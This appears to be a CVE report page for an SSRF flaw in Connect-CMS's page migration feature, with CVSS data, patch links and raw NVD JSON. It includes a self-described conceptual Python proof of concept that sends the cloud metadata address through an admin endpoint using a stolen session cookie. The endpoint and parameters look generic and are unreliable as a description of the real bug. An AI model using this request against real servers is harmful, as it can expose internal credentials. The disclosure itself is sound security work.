Security Vulnerability Report
CVE-2026-32279 CVSS 6.8 MEDIUM

Published: 2026-03-23 22:16:28
Last Modified: 2026-03-24 20:28:37

Description

Connect-CMS is a content management system. In versions on the 1.x series up to and including 1.41.0 and versions on the 2.x series up to and including 2.41.0, a Server-Side Request Forgery (SSRF) issue exists in the external page migration feature of the Page Management Plugin. Versions 1.41.1 and 2.41.1 contain a patch.

CVSS Details

CVSS Score: 6.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:opensource-workshop:connect-cms:*:*:*:*:*:*:*:* - VULNERABLE (Connect-CMS 1.x <= 1.41.0)
cpe:2.3:a:opensource-workshop:connect-cms:*:*:*:*:*:*:*:* - VULNERABLE (Connect-CMS 2.x <= 2.41.0)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# POC for CVE-2026-32279 (Conceptual)
# This script demonstrates how an attacker might trigger the SSRF
# by sending a crafted request to the migration endpoint.
import requests

target_url = "http://target-cms.com/admin/page/migrate"

# Attacker controlled URL pointing to internal metadata service
malicious_url = "http://169.254.169.254/latest/meta-data/"

# Authentication is required (PR:H), assuming session cookie is obtained
cookies = {
    "SESSIONID": "stolen_admin_session_id"
}

payload = {
    "url": malicious_url,
    "action": "import"
}

try:
    response = requests.post(target_url, data=payload, cookies=cookies)
    if response.status_code == 200:
        print("Request sent successfully. Check response for SSRF indication.")
        print(response.text[:200])
except Exception as e:
    print(f"Error: {e}")

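References

https://github.com/opensource-workshop/connect-cms/commit/4a1a64a8f768a53e06a4239e25782d9e2e88fc63 (Patch)
https://github.com/opensource-workshop/connect-cms/commit/617a874e14b8476da7c0760a06384b9da21bdd4f (Patch)
https://github.com/opensource-workshop/connect-cms/releases/tag/v1.41.1 (Release Notes)
https://github.com/opensource-workshop/connect-cms/releases/tag/v2.41.1 (Release Notes)
https://github.com/opensource-workshop/connect-cms/security/advisories/GHSA-jh46-85jr-6ph9 (Vendor Advisory)
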
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32279", "sourceIdentifier": "[email protected]", "published": "2026-03-23T22:16:27.617", "lastModified": "2026-03-24T20:28:36.733", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Connect-CMS is a content management system. In versions on the 1.x series up to and including 1.41.0 and versions on the 2.x series up to and including 2.41.0, a Server-Side Request Forgery (SSRF) issue exists in the external page migration feature of the Page Management Plugin. Versions 1.41.1 and 2.41.1 contain a patch."}, {"lang": "es", "value": "Connect-CMS es un sistema de gestión de contenidos. En las versiones de la serie 1.x hasta la 1.41.0 inclusive y las versiones de la serie 2.x hasta la 2.41.0 inclusive, existe un problema de falsificación de petición del lado del servidor (SSRF) en la función de migración de páginas externas del plugin de Gestión de Páginas. Las versiones 1.41.1 y 2.41.1 contienen un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensource-workshop:connect-cms:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.41.1", "matchCriteriaId": "60B8BBDF-82BD-486D-AE17-7F59360E62C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:opensource-workshop:connect-cms:*:*:*:*:*:*:*:*", 
"versionStartIncluding": "2.0.0", "versionEndExcluding": "2.41.1", "matchCriteriaId": "0C11B4F0-DF29-473A-A285-9DA152DDCDE1"}]}]}], "references": [{"url": "https://github.com/opensource-workshop/connect-cms/commit/4a1a64a8f768a53e06a4239e25782d9e2e88fc63", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/opensource-workshop/connect-cms/commit/617a874e14b8476da7c0760a06384b9da21bdd4f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/opensource-workshop/connect-cms/releases/tag/v1.41.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/opensource-workshop/connect-cms/releases/tag/v2.41.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/opensource-workshop/connect-cms/security/advisories/GHSA-jh46-85jr-6ph9", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}